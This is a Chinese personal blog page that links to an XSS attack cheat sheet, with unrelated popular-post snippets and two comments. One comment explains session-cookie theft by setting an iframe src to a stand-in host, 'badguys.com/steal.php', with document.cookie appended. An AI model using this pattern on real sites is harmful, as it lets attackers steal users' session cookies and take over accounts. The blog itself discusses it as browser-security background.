XSS攻擊招式表
好多的攻擊方法啊@@
全文連結
訂閱:
張貼留言 (Atom)
造訪人次
Popular Posts
-
信賴運算的靈魂就是 Trusted Platform Module ,它可以是軟體,也可以是鑲嵌在主機板上的晶片,不過為了安全性考量,應該是採用硬體製作。每個 TPM 都會內建一對獨一無二的公共密碼學金鑰,稱為 Endorsement key ( EK )。 ...
-
Nightmare sphere SCII單人戰役全破後在網路上閒逛時,發現這款惡魔城的同人,而且網路上評價非常高。又是官方免費下載,就抓回來玩了,結果這兩三天除了吃飯睡覺就全部都在打這款遊戲了。因為太好玩了www,我的感覺甚至比惡魔城月下城之夜還要好玩wwww。 相較於月下,解...
-
呼....有很多非醫學系的人在看這個版,就來寫一下吧。 我當初的志願其實是資工,學測我拿了73級分,台清交三家資工的初試我都過了,不過後來因為父母的期望還有自己對經濟穩定性的考量進了醫學系。 醫學系的功課內容如何呢?醫學系比起高中實在累太多了,當年大學聯考的時候我沒有熬過一次夜,...
-
第三把機械鍵盤入手,正式成為鍵盤富翁 XD 前兩把分別是 Ducky 2108s 和 Ducky ONE 2,都是青軸。以前覺得機械鍵盤就是只有分「青軸」跟「其他」,畢竟最接近小時候鍵盤的感覺。 但後來青軸打到精神疲勞。看到別人鍵盤和各種傳教影片就入坑這把狼蛛 F99,蝦皮 $1...
-
不知道是誰想出來的XD 從ptt2來的 --- 水至清則無魚,人至賤則無敵 自從我變成了狗屎,就再也沒有人敢踩在我頭上了. ---
-
魔喚精靈VMJ是一款「戰棋」類的遊戲,交戰規則是:兩方開始都會各有一個「精靈主」,兩者都有10點生命值,還有隨不同精靈主而不同之攻擊、防禦、術攻、術防、速度、移動力。精靈主可以移動、耗費法力召喚精靈、施展法術(包含共用術及專用術)、待機等。被召喚出來的精靈也有10點生命值,也有攻...
-
為了寫出更強大的班網,為了研究phpBB2的原始碼,今天補習回來把所有時間都花在Zend Studio和Zend Platform上。Zend Studio是一個專門寫PHP的IDE,有internal和Server兩個除錯器可以用。internal除錯器由模擬的Web serv...
-
這大概會是我唯一一次在部落格上面紀錄H game... 會想辦法去找這塊遊戲,原因是因為Fate Stay Night的動畫引起了我龐大的興趣,看網路上翻譯的小說還不過癮,決定去找原始遊戲來玩。 Type Moon當初把FSN動畫化預期的是:花錢做出Fate Stay Night...
-
連結 連結中的影片有幾個frame會有點糟糕,慎入XD 不知道為甚麼看到這檔影片就一直想到DL和Twsam....XD,看來我還是繼續跟書本做朋友比較好XD
-
連結 過完(?)高微之後就試著進階實變了。很幸運的是實變的部份也找到好的課程。 好課真的幫助巨大,之前遇過另一位老師,高微開頭直奔 metric space 的定義然後各種證明,用未知概念解釋未知概念,最後上到霧煞煞只能放棄。雖然老師講的很認真,清晰,但就是不適合我的程度或情...
2 意見:
你最近有想要當黑人的傾向喔 XDD
哈哈 :P
沒有啦...只是作javascript的時候被firefox用exception砸到死,然後研究過程中自然就會碰到這些東西orz,畢竟這些exception都是為了防備XSS而存在的嘛orz
不過有種說法是,其實XSS防禦的罩門是iframe....因為iframe的src可以指定自己domain以外的來源,這是為了服務廣告商而留下來的歷史遺跡,不可能禁止。所以有種說法是用document.cookie抓到想要的東西後指定iframe src="badguys.com/steal.php?usercookie="+document.cookie就可以實際把request送出去,而雖然因為Domain不同,瀏覽器會阻擋main frame存取iframe的contentDocument,不過已經來不及了orz
張貼留言